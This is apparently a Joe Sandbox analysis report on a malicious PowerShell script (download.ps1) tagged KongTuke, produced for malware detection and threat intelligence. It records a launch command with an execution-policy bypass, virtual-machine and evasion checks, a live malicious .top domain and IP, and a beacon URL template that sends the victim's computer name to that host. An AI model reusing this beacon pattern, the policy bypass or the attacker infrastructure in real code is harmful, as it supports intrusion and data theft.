Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1578248
MD5:f91e3c78bfc0cc41330d65764455a851
SHA1:294c15d09a7df4d91e891d7ca3bc2803c8262ce1
SHA256:3cef01524b94194e6e6834746b8215ebdd4b51c29e92187d6e59e8be1b365934
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 4164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4164, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4164, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527Avira URL Cloud: Label: malware
Source: http://cmacnnkfbhlcncm.topAvira URL Cloud: Label: malware
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbu source: powershell.exe, 00000000.00000002.2186794681.00000225C4C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2140421912.00000225AA652000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2140421912.00000225AA652000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbS source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2183490540.00000225C4824000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2184943759.00000225C4BD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2184943759.00000225C4B17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb: source: powershell.exe, 00000000.00000002.2187129153.00000225C4CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbP source: powershell.exe, 00000000.00000002.2186794681.00000225C4C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbdll source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

Networking

barindex
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225ADC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=527
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE00F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225ADC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.2141075548.00000225ADC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
Source: powershell.exe, 00000000.00000002.2183490540.00000225C4898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: powershell.exe, 00000000.00000002.2183490540.00000225C4898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro6
Source: powershell.exe, 00000000.00000002.2184584754.00000225C4910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEDB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE00F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE00F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.c
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-20
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F47AC60_2_00007FF848F47AC6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F488720_2_00007FF848F48872
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfgX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg`
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: var e=this||self;var g,h;a:{for(var k=["CLOSURE_FLAGS"],l=e,n=0;n<k.length;n++)if(l=l[k[n]],l==null){h=null;break a}h=l}var p=h&&h[610401301];g=p!=null?p:!1;var q,r=e.navigator;q=r?r.userAgentData||null:nulldocument,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
